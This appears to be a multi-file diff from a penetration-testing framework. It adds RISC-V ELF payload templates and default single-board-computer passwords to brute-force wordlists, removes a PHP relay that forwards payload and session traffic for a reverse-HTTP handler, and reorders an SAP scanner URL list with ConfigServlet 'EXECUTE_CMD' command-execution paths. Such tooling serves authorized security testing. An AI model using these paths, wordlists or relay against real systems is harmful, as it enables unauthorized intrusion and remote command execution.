+    "commit": {
+      "sha": "56fa824510d8a35b08e3b42bf6625c846e2ed5a0"
+    }
+  },
+  {
+    "name": "v0.7.0",
+    "commit": {
+      "sha": "fdd9ad94c11d44259ef26bf4b2dc9a8bd139f607"
+    }
+  },
+  {
+    "name": "v0.6.2",
+    "commit": {
+      "sha": "b0c367cac7211117e88a55517396764036ac0552"
+    }
+  },
+  {
+    "name": "v0.6.1",
+    "commit": {
+      "sha": "ef0dacb0c36a1a180ef8fda670c82854658aab00"
+    }
+  },
+  {
+    "name": "v0.6.0",
+    "commit": {
+      "sha": "e72f6d6d5dd078df2d270cc48a4087588443f89a"
+    }
+  },
+  {
+    "name": "v0.5.0",
+    "commit": {
+      "sha": "027d9b4653e2f3ea13d4de6a0b2bd568106ffb40"
+    }
+  },
+  {
+    "name": "v0.4.0",
+    "commit": {
+      "sha": "521ba0cb2f63110eb2ed13a7054a4d70238a862a"
+    }
+  },
+  {
+    "name": "v0.3.3",
+    "commit": {
+      "sha": "38c4cf7dd9275294348bab903be9dc12eafe37dd"
+    }
+  },
+  {
+    "name": "v0.3.2",
+    "commit": {
+      "sha": "9d9d31a6694ab1fc12da20ea18fa5a778ce5a631"
+    }
+  },
+  {
+    "name": "v0.3.1",
+    "commit": {
+      "sha": "e75c251013845f1921ea75c24b44fd7164ee398d"
+    }
+  },
+  {
+    "name": "v0.3.0",
+    "commit": {
+      "sha": "9606d7ee5ab3b8056b4a69610ae79b7b473d779d"
+    }
+  },
+  {
+    "name": "v0.2.1",
+    "commit": {
+      "sha": "da29a200cd8ec46da709e0523787479ac6fb274b"
+    }
+  },
+  {
+    "name": "v0.2.0",
+    "commit": {
+      "sha": "2e345f6f6caeb3495f6454bfaa5a10bf50639411"
+    }
+  },
+  {
+    "name": "v0.1.0",
+    "commit": {
+      "sha": "1869a7f0a85ceaa707ea25866da98a3ac5a0667e"
+    }
+  },
+  {
+    "name": "v0.0.10",
+    "commit": {
+      "sha": "f08970c1d8910091a392d26b51db33b5c99a0f81"
+    }
+  },
+  {
+    "name": "v0.0.9",
+    "commit": {
+      "sha": "f98abfb79dc2c437f1b6cb5f534da560c85c5406"
+    }
+  },
+  {
+    "name": "v0.0.8",
+    "commit": {
+      "sha": "222cf2c65189c97877491c7bcc6fc14982ce65d7"
+    }
+  },
+  {
+    "name": "v0.0.7",
+    "commit": {
+      "sha": "2a743a5bf4b27a6cc9cb857bd178c2e724d98821"
+    }
+  },
+  {
+    "name": "v0.0.6",
+    "commit": {
+      "sha": "f6253b6bfaa249236ac1b4f0505f4b7af8f89116"
+    }
+  },
+  {
+    "name": "v0.0.5",
+    "commit": {
+      "sha": "abae56b3d0d2383d0351280213236cd988fd6d28"
+    }
+  },
+  {
+    "name": "v0.0.4",
+    "commit": {
+      "sha": "4190d76f2fefb65cb898f6c648e932b2c1a5fba3"
+    }
+  },
+  {
+    "name": "v0.0.3",
+    "commit": {
+      "sha": "8057dc123f23f6da9752d712edeb5e7e490b648c"
+    }
+  },
+  {
+    "name": "v0.0.2",
+    "commit": {
+      "sha": "f5bb336a75351379dad289b73a85f6ebf8ff5498"
+    }
+  },
+  {
+    "name": "v0.0.1",
+    "commit": {
+      "sha": "ed08f278f95dca46e58e24a13923939d268eedd3"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.7.1",
+    "commit": {
+      "sha": "c998e17e8322a867c02ef4cdf577aa33c2d3a81e"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.7.0",
+    "commit": {
+      "sha": "78cc4dd981a89b26006fea0984f1305bc663281f"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.2",
+    "commit": {
+      "sha": "838fb604d569dae18a1a7a85ef28ed2c125df986"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.1",
+    "commit": {
+      "sha": "4a1e987a1d2a958119ab5c936d4b1d82125e14d9"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.0",
+    "commit": {
+      "sha": "f2a2574ddc8bbe20776071569935922c3593d5e7"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.5.4",
+    "commit": {
+      "sha": "334ba3df99dfc84385faace167f6410c8ce0be91"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.5.3",
+    "commit": {
+      "sha": "cbb166026d8c6360836def9bf9c208313023961c"
+    }
+  }
+]
@@ -83,6 +83,8 @@
 <% description = "The module is expected to get a shell every time it runs." %>
 <% elsif reliability == "unreliable-session" %>
 <% description = "The module isn't expected to get a shell reliably (such as only once)." %>
+<% elsif reliability == "event-dependent" %>
+<% description = "The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc." %>
 <% end %>

 * **<%= reliability %>:** <%= description %>
@@ -1,68 +0,0 @@
-<?php
-$magic = 'TzGq';
-$tempdir = sys_get_temp_dir() . "/hop" . $magic;
-if(!is_dir($tempdir)){
-	mkdir($tempdir); //make sure it's there
-}
-
-//get url
-$url = $_SERVER["QUERY_STRING"];
-//like /path/hop.php?/uRIcksm_lOnGidENTifIEr
-
-//Looks for a file with a name or contents prefix, if found, send it and deletes it
-function findSendDelete($tempdir, $prefix, $one=true){
-	if($dh = opendir($tempdir)){
-		while(($file = readdir($dh)) !== false){
-			if(strpos($file, $prefix) !== 0){
-				continue;
-			}
-			readfile($tempdir."/".$file);
-			unlink($tempdir."/".$file);
-			if($one){
-				break;
-			}
-		}
-	}
-}
-
-//handle control
-if($url === "/control"){
-	if($_SERVER['REQUEST_METHOD'] === 'POST'){
-		//handle data for payload - save in a "down" file or the "init" file
-		$postdata = file_get_contents("php://input");
-		if(array_key_exists('HTTP_X_INIT', $_SERVER)){
-			$f = fopen($tempdir."/init", "w"); //only one init file
-		}else{
-			$prefix = "down_" . sha1($_SERVER['HTTP_X_URLFRAG']);
-			$f = fopen(tempnam($tempdir,$prefix), "w");
-		}
-		fwrite($f, $postdata);
-		fclose($f);
-	}else{
-		findSendDelete($tempdir, "up_", false);
-	}
-}else if($_SERVER['REQUEST_METHOD'] === 'POST'){
-	//get data
-	$postdata = file_get_contents("php://input");
-	//See if we should send anything down
-	if($postdata === "RECV\x00" || $postdata === "RECV"){
-		findSendDelete($tempdir, "down_" . sha1($url));
-		$fname = $tempdir . "/up_recv_" . sha1($url); //Only keep one RECV poll
-	}else{
-		$fname = tempnam($tempdir, "up_"); //actual data gets its own filename
-	}
-	//find free and write new file
-	$f = fopen($fname, "w");
-	fwrite($f, $magic);
-	//Little-endian pack length and data
-	$urlen = strlen($url);
-	fwrite($f, pack('V', $urlen));
-	fwrite($f, $url);
-	$postdatalen = strlen($postdata);
-	fwrite($f, pack('V', $postdatalen));
-	fwrite($f, $postdata);
-	fclose($f);
-//Initial query will be a GET and have a 12345 in it
-}else if(strpos($url, "12345") !== FALSE){
-	readfile($tempdir."/init");
-}
@@ -0,0 +1,98 @@
+; build with:
+;   nasm elf_dll_riscv32le_template.s -f bin -o template_riscv32le_linux_dll.bin
+
+BITS 32
+
+org     0
+
+ehdr:
+  db    0x7f, "ELF", 1, 1, 1, 0    ; e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0
+  dw    3                          ; e_type    = ET_DYN
+  dw    0xF3                       ; e_machine = EM_RISCV
+  dd    1                          ; e_version = EV_CURRENT
+  dd    _start                     ; e_entry   = _start
+  dd    phdr - $$                  ; e_phoff
+  dd    shdr - $$                  ; e_shoff
+  dd    0                          ; e_flags
+  dw    ehdrsize                   ; e_ehsize
+  dw    phdrsize                   ; e_phentsize
+  dw    2                          ; e_phnum
+  dw    shentsize                  ; e_shentsize
+  dw    2                          ; e_shnum
+  dw    1                          ; e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:
+  dd    1                          ; p_type       = PT_LOAD
+  dd    0                          ; p_offset
+  dd    $$                         ; p_vaddr
+  dd    $$                         ; p_paddr
+  dd    0xDEADBEEF                 ; p_filesz
+  dd    0xDEADBEEF                 ; p_memsz
+  dd    7                          ; p_flags      = rwx
+  dd    0x1000                     ; p_align
+
+phdrsize equ  $ - phdr
+
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dd    dynsection                 ; p_offset
+  dd    dynsection                 ; p_vaddr
+  dd    dynsection                 ; p_vaddr
+  dd    dynsz                      ; p_filesz
+  dd    dynsz                      ; p_memsz
+  dd    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dd    0                          ; sh_flags
+  dd    dynsection                 ; sh_addr
+  dd    dynsection                 ; sh_offset
+  dd    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dd    8                          ; sh_addralign
+  dd    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dd    0                          ; sh_flags
+  dd    strtab                     ; sh_addr
+  dd    strtab                     ; sh_offset
+  dd    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dd    0                          ; sh_addralign
+  dd    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dd    0x0c
+  dd    _start
+; DT_STRTAB
+  dd    0x05
+  dd    strtab
+; DT_SYMTAB
+  dd    0x06
+  dd    strtab
+; DT_STRSZ
+  dd    0x0a
+  dd    0
+; DT_SYMENT
+  dd    0x0b
+  dd    0
+; DT_NULL
+  dd    0x00
+  dd    0
+dynsz equ $ - dynsection
+
+strtab:
+ db 0
+ db 0
+strtabsz equ $ - strtab
+
+global _start
+_start:
@@ -0,0 +1,99 @@
+; build with:
+;   nasm elf_dll_riscv64le_template.s -f bin -o template_riscv64le_linux_dll.bin
+
+BITS 64
+
+org     0
+
+ehdr:                            ; Elf64_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    3                        ;   e_type       = ET_DYN
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    shdr - $$                ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    2                        ;   e_phnum
+  dw    shentsize                ;   e_shentsize
+  dw    2                        ;   e_shnum
+  dw    1                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+  dd    2                          ; p_type  = PT_DYNAMIC
+  dd    7                          ; p_flags = rwx
+  dq    dynsection                 ; p_offset
+  dq    dynsection                 ; p_vaddr
+  dq    dynsection                 ; p_vaddr
+  dq    dynsz                      ; p_filesz
+  dq    dynsz                      ; p_memsz
+  dq    0x1000                     ; p_align
+
+shdr:
+  dd    1                          ; sh_name
+  dd    6                          ; sh_type = SHT_DYNAMIC
+  dq    0                          ; sh_flags
+  dq    dynsection                 ; sh_addr
+  dq    dynsection                 ; sh_offset
+  dq    dynsz                      ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    8                          ; sh_addralign
+  dq    7                          ; sh_entsize
+shentsize equ $ - shdr
+  dd    0                          ; sh_name
+  dd    3                          ; sh_type = SHT_STRTAB
+  dq    0                          ; sh_flags
+  dq    strtab                     ; sh_addr
+  dq    strtab                     ; sh_offset
+  dq    strtabsz                   ; sh_size
+  dd    0                          ; sh_link
+  dd    0                          ; sh_info
+  dq    0                          ; sh_addralign
+  dq    0                          ; sh_entsize
+
+dynsection:
+; DT_INIT
+  dq    0x0c
+  dq    _start
+; DT_STRTAB
+  dq    0x05
+  dq    strtab
+; DT_SYMTAB
+  dq    0x06
+  dq    strtab
+; DT_STRSZ
+  dq    0x0a
+  dq    0
+; DT_SYMENT
+  dq    0x0b
+  dq    0
+; DT_NULL
+  dq    0x00
+  dq    0
+
+dynsz equ $ - dynsection
+
+strtab:
+ db 0
+ db 0
+strtabsz equ $ - strtab
+
+align 16
+global _start
+_start:
@@ -9,7 +9,7 @@ ehdr:                            ; Elf32_Ehdr
  db    0, 0, 0, 0,  0, 0, 0, 0  ;
  dw    2                        ;   e_type       = ET_EXEC for an executable
  dw    0xB7                     ;   e_machine    = AARCH64
-  dd    0                        ;   e_version
+  dd    1                        ;   e_version
  dq    _start                   ;   e_entry
  dq    phdr - $$                ;   e_phoff
  dq    0                        ;   e_shoff
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_riscv32le_template.s -f bin -o template_riscv32le_linux.bin
+
+BITS 32
+
+org     0x00010000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 1, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dd    _start                   ;   e_entry
+  dd    phdr - $$                ;   e_phoff
+  dd    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    0                        ;   p_offset
+  dd    $$                       ;   p_vaddr
+  dd    $$                       ;   p_paddr
+  dd    0xDEADBEEF               ;   p_filesz
+  dd    0xDEADBEEF               ;   p_memsz
+  dd    7                        ;   p_flags      = rwx
+  dd    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -0,0 +1,42 @@
+; build with:
+;   nasm elf_riscv64le_template.s -f bin -o template_riscv64le_linux.bin
+
+BITS 64
+
+org     0x00400000
+
+ehdr:                            ; Elf32_Ehdr
+  db    0x7F, "ELF", 2, 1, 1, 0  ;   e_ident
+  db    0, 0, 0, 0,  0, 0, 0, 0  ;
+  dw    2                        ;   e_type       = ET_EXEC for an executable
+  dw    0xF3                     ;   e_machine    = RISCV
+  dd    1                        ;   e_version
+  dq    _start                   ;   e_entry
+  dq    phdr - $$                ;   e_phoff
+  dq    0                        ;   e_shoff
+  dd    0                        ;   e_flags
+  dw    ehdrsize                 ;   e_ehsize
+  dw    phdrsize                 ;   e_phentsize
+  dw    1                        ;   e_phnum
+  dw    0                        ;   e_shentsize
+  dw    0                        ;   e_shnum
+  dw    0                        ;   e_shstrndx
+
+ehdrsize equ  $ - ehdr
+
+phdr:                            ; Elf32_Phdr
+  dd    1                        ;   p_type       = PT_LOAD
+  dd    7                        ;   p_flags      = rwx
+  dq    0                        ;   p_offset
+  dq    $$                       ;   p_vaddr
+  dq    $$                       ;   p_paddr
+  dq    0xDEADBEEF               ;   p_filesz
+  dq    0xDEADBEEF               ;   p_memsz
+  dq    0x1000                   ;   p_align
+
+phdrsize equ  $ - phdr
+
+global _start
+
+_start:
+
@@ -1454,6 +1454,7 @@ bewan
 beyonce
 bhaby
 bhebhe
+bianbu
 bianca
 bier
 bigboy
@@ -3061,6 +3062,7 @@ lucas
 lucenttech1
 lucenttech2
 lucero
+luckfox
 lucky
 lucky1
 lucky7
@@ -3248,6 +3250,7 @@ mikel
 mikey
 milagros
 milkshake
+milkv
 miller
 millie
 mine
@@ -3477,6 +3480,7 @@ operator
 oqksad
 oracle
 orange
+orangepi
 orlando
 orpheus
 oscar
@@ -4192,6 +4196,7 @@ stacey
 stanley
 star
 starfish
+starfive
 stargate
 stark123
 starl
@@ -7290,6 +7290,7 @@ bi
 bi-level
 bia
 bialystok
+bianbu
 bianca
 bianco
 bianka
@@ -44356,6 +44357,7 @@ limy
 lin
 lina
 linage
+linaro
 linc
 linchpin
 lincoln
@@ -45397,6 +45399,7 @@ lucita
 lucite
 lucius
 luck
+luckfox
 luckhoff
 luckier
 luckily
@@ -49040,6 +49043,7 @@ milkshark
 milksop
 milkweed
 milkwoodpark
+milkv
 milky
 mill
 millaa
@@ -55429,6 +55433,7 @@ orang-utan
 orang-utans
 orange
 orangeade
+orangepi
 orangery
 oranges
 orangey
@@ -63171,6 +63176,7 @@ radium
 radius
 radix
 radon
+radxa
 rae
 raeann
 raedene
@@ -74326,6 +74332,7 @@ stardust
 stare
 starer
 starfish
+starfive
 starfruit
 stargate
 stargaze
@@ -77837,6 +77844,7 @@ temporizer
 temporizing
 temporizingly
 temporizings
+temppwd
 tempt
 temptation
 tempted
@@ -1,3 +1,7 @@
+/@download@
+/ADS-EJB
+/ADS-License
+/AE/index.jsp
 /AdapterFramework/version/version.jsp
 /AdminTools/
 /Adobe
@@ -5,64 +9,26 @@
 /AdobeDocumentServices/Config?wsdl
 /AdobeDocumentServices/Grmg
 /AdobeDocumentServicesSec/Config
-/ADS-EJB
-/ADS-License
-/AE/index.jsp
 /AnalyticalReporting/
 /AnalyticalReporting/AnalyticalReporting_merge_web.xml
 /AnalyticalReporting/download/win32/websetup.properties
-/apidocs/
-/apidocs/allclasses-frame.html
-/apidocs/com/sap/engine/connector/connection/IConnection.html
-/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
-/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
-/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
 /ApplicationAdminProvider
-/bcb/
-/bcb/bcbadmHome.jsp
-/bcb/bcbadmNavigation.jsp
-/bcb/bcbadmSettings.jsp
-/bcb/bcbadmStart.jsp
-/bcb/bcbadmSystemInfo.jsp
-/bcbtest/start.jsp
 /BI_UDC
 /BizcCommLayerAuthoring/Config1
 /BizcCommLayerAuthoring/Config1?wsdl
 /BizcCommLayerAuthoring/Config?wsdl
-/bwtest
-/caf
 /CAFDataService/Config
 /CAFDataService/Config?wsdl
-/ccsui
-/CmcApp/logon.faces
 /CMSRTS/Config1
 /CMSRTS/Config1?wsdl
 /CMSRTS/Config?wsdl
-/com~tc~lm~webadmin~httpprovider~web
+/CmcApp/logon.faces
 /CrystalReports/viewrpt.cwr
-/ctc
-/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
-/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 /DataArchivingService
-/dispatcher
-/@download@
-/dswsbobje
-/dswsbobje/services/BICatalog?wsdl
-/dswsbobje/services/listServices
-/examples/
-/examples_frame.html
-/examples.html
-/exchangeProfile/
 /GRMGHeartBeat
 /GRMGWSTest/service
 /GRMGWSTest/service?wsdl
-/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
-/htmlb/
-/htmlb/docs/api/index.html
-/htmlb/index.html
-/htmlb/jsp/index.jsp
-/htmlb/moresamples.html
-/htmlb/samples.html
+/IGSCustomizingXML
 /IciActionItemService/IciActionItemConf
 /IciActionItemService/IciActionItemConf?wsdl
 /IciChatLineService/IciChatLineConf
@@ -86,11 +52,67 @@
 /IciSystemService/IciSystemConf?wsdl
 /IciUserService/IciUserConf
 /IciUserService/IciUserConf?wsdl
-/IGSCustomizingXML
-/index.html
 /InfoViewApp/
 /InfoViewApp/help/en/user/html/
 /InfoViewApp/listing/main.do?appKind=InfoView&service=%2FInfoViewApp%2Fcommon%2FappService.do
+/KW
+/Lighthammer
+/Modeler
+/OpenSQLMonitors/
+/PerformacetraceTraceApplication
+/RE/index.jsp
+/SAPIKS
+/SAPIKS2
+/SAPIKS2/contentShow.sap
+/SAPIKS2/jsp/adminShow.jsp
+/SAPIrExtHelp
+/SLDStart/plain
+/SLDStart/secure
+/SQLtrace/index.html
+/TOdbo
+/TSapq
+/TXmla
+/TestJDBC_Web
+/VC
+/WSConnector/Config1
+/WSConnector/Config1?wsdl
+/WSConnector/Config?wsdl
+/apidocs/
+/apidocs/allclasses-frame.html
+/apidocs/com/sap/engine/connector/connection/IConnection.html
+/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
+/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
+/bcb/
+/bcb/bcbadmHome.jsp
+/bcb/bcbadmNavigation.jsp
+/bcb/bcbadmSettings.jsp
+/bcb/bcbadmStart.jsp
+/bcb/bcbadmSystemInfo.jsp
+/bcbtest/start.jsp
+/bwtest
+/caf
+/ccsui
+/com~tc~lm~webadmin~httpprovider~web
+/ctc
+/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
+/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
+/dispatcher
+/dswsbobje
+/dswsbobje/services/BICatalog?wsdl
+/dswsbobje/services/listServices
+/examples.html
+/examples/
+/examples_frame.html
+/exchangeProfile/
+/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
+/htmlb/
+/htmlb/docs/api/index.html
+/htmlb/index.html
+/htmlb/jsp/index.jsp
+/htmlb/moresamples.html
+/htmlb/samples.html
+/index.html
 /inspection.wsil
 /ipcpricing/ui/
 /irj
@@ -111,32 +133,26 @@
 /irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
 /irj/servlet/prt/portal/prtroot/pcd!(*)
 /irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
-/KW
-/Lighthammer
 /logon
 /logon/index.jsp
 /logon/logonServlet
-/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
 /logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
-/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
+/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
 /logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
+/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
 /main.html
 /meSync/HttpGRMGTest.html
 /mmr/
 /mmr/mmr/MMRUI.html
-/Modeler
 /modeller/
 /modeller/index.html
 /monitoring
 /monitoring/SystemInfo
 /nwa
-/OpenSQLMonitors/
-/PerformacetraceTraceApplication
 /performanceProvierRoot
 /pmi
 /portal
 /portalapps
-/RE/index.jsp
 /rep/build_info.html
 /rep/build_info.jsp
 /rep/start/index.jsp
@@ -147,9 +163,24 @@
 /samlssodemo_dest
 /samlssodemo_source
 /sap/
+/sap/BSSP_SP_MAPS
+/sap/IStest
 /sap/admin
 /sap/admin/public/index.html
 /sap/ap
+/sap/bc/FormToRfc
+/sap/bc/FormToRfc/soap
+/sap/bc/IDoc_XML
+/sap/bc/MIDSD
+/sap/bc/MJC
+/sap/bc/MJC/
+/sap/bc/MJC/mi_host
+/sap/bc/MJC/mi_mds
+/sap/bc/MJC/mi_service
+/sap/bc/MJC/mi_services
+/sap/bc/MY_NEW_SERV99
+/sap/bc/Mi_host_http
+/sap/bc/Mime
 /sap/bc/abap/demo
 /sap/bc/abap/demo_apc
 /sap/bc/abap/demo_apc_pcp
@@ -184,34 +215,34 @@
 /sap/bc/bsp/sap/certmap
 /sap/bc/bsp/sap/certreq
 /sap/bc/bsp/sap/crm_bsp_frame
+/sap/bc/bsp/sap/crm_ic_ise/editor
+/sap/bc/bsp/sap/crm_thtmlb_util
+/sap/bc/bsp/sap/crm_ui_frame
+/sap/bc/bsp/sap/crm_ui_start
 /sap/bc/bsp/sap/crmcmp_bpident/
 /sap/bc/bsp/sap/crmcmp_brfcase
 /sap/bc/bsp/sap/crmcmp_hdr
 /sap/bc/bsp/sap/crmcmp_hdr_std
 /sap/bc/bsp/sap/crmcmp_ic_frame
-/sap/bc/bsp/sap/crm_ic_ise/editor
-/sap/bc/bsp/sap/crm_thtmlb_util
-/sap/bc/bsp/sap/crm_ui_frame
-/sap/bc/bsp/sap/crm_ui_start
-/sap/bc/bsp/sap/esh_sapgui_exe
 /sap/bc/bsp/sap/esh_sap_link
+/sap/bc/bsp/sap/esh_sapgui_exe
 /sap/bc/bsp/sap/graph_bsp_test
 /sap/bc/bsp/sap/graph_bsp_test/Mimes
 /sap/bc/bsp/sap/gsbirp
 /sap/bc/bsp/sap/hrrcf_wd_dovru
 /sap/bc/bsp/sap/htmlb_samples
+/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/iccmp_bp_cnfirm
 /sap/bc/bsp/sap/iccmp_hdr_cntnr
 /sap/bc/bsp/sap/iccmp_hdr_cntnt
 /sap/bc/bsp/sap/iccmp_header
 /sap/bc/bsp/sap/iccmp_ssc_ll/
-/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/it00
 /sap/bc/bsp/sap/it00/default.htm
 /sap/bc/bsp/sap/it00/http_client.htm
 /sap/bc/bsp/sap/it00/http_client_xml.htm
-/sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/FAA
+/sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/graphics
 /sap/bc/bsp/sap/public/sem
 /sap/bc/bsp/sap/sam_demo
@@ -221,17 +252,17 @@
 /sap/bc/bsp/sap/sbspext_xhtmlb
 /sap/bc/bsp/sap/spi_admin
 /sap/bc/bsp/sap/spi_monitor
-/sap/bc/bsp/sapsrm
-/sap/bc/bsp/sapsrm/bsp_dhtml_apple
-/sap/bc/bsp/sapsrm/bsp_java_applet
-/sap/bc/bsp/sapsrm/call_sig_ctrl
-/sap/bc/bsp/sapsrm/ctlg_wrapper
 /sap/bc/bsp/sap/sxms_alertrules
 /sap/bc/bsp/sap/system
 /sap/bc/bsp/sap/thtmlb_scripts
 /sap/bc/bsp/sap/thtmlb_styles
 /sap/bc/bsp/sap/uicmp_ltx
 /sap/bc/bsp/sap/xmb_bsp_log
+/sap/bc/bsp/sapsrm
+/sap/bc/bsp/sapsrm/bsp_dhtml_apple
+/sap/bc/bsp/sapsrm/bsp_java_applet
+/sap/bc/bsp/sapsrm/call_sig_ctrl
+/sap/bc/bsp/sapsrm/ctlg_wrapper
 /sap/bc/contentserver
 /sap/bc/docu
 /sap/bc/echo
@@ -249,23 +280,10 @@
 /sap/bc/erecruiting/verification
 /sap/bc/error
 /sap/bc/error 
-/sap/bc/FormToRfc
-/sap/bc/FormToRfc/soap
 /sap/bc/graphics/net
 /sap/bc/gui/sap/its/CERTREQ
 /sap/bc/gui/sap/its/designs
 /sap/bc/gui/sap/its/webgui
-/sap/bc/IDoc_XML
-/sap/bc/MIDSD
-/sap/bc/Mi_host_http
-/sap/bc/Mime
-/sap/bc/MJC
-/sap/bc/MJC/
-/sap/bc/MJC/mi_host
-/sap/bc/MJC/mi_mds
-/sap/bc/MJC/mi_service
-/sap/bc/MJC/mi_services
-/sap/bc/MY_NEW_SERV99
 /sap/bc/ping
 /sap/bc/report
 /sap/bc/soap/ici
@@ -276,19 +294,23 @@
 /sap/bc/wdvd
 /sap/bc/wdvd/
 /sap/bc/webdynpro
+/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
+/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
+/sap/bc/webdynpro/sap/WDR_TEST_TABLE
+/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
 /sap/bc/webdynpro/sap/apb_launchpad
 /sap/bc/webdynpro/sap/apb_launchpad_nwbc
 /sap/bc/webdynpro/sap/apb_lpd_light_start
 /sap/bc/webdynpro/sap/apb_lpd_start_url
-/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/appl_log_trc_viewer
 /sap/bc/webdynpro/sap/appl_soap_management
+/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
 /sap/bc/webdynpro/sap/cnp_light_test
 /sap/bc/webdynpro/sap/configure_application
 /sap/bc/webdynpro/sap/configure_component
-/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_adm_smoketest_ui
+/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_eng_modelling
 /sap/bc/webdynpro/sap/esh_search_results.ui
 /sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
@@ -314,25 +336,20 @@
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
 /sap/bc/webdynpro/sap/hrrcf_a_tp_assess
-/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
 /sap/bc/webdynpro/sap/sh_adm_smoketest_files
 /sap/bc/webdynpro/sap/wd_analyze_config_appl
 /sap/bc/webdynpro/sap/wd_analyze_config_comp
 /sap/bc/webdynpro/sap/wd_analyze_config_user
 /sap/bc/webdynpro/sap/wdhc_application
-/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
-/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
 /sap/bc/webdynpro/sap/wdr_test_popups_rt
-/sap/bc/webdynpro/sap/WDR_TEST_TABLE
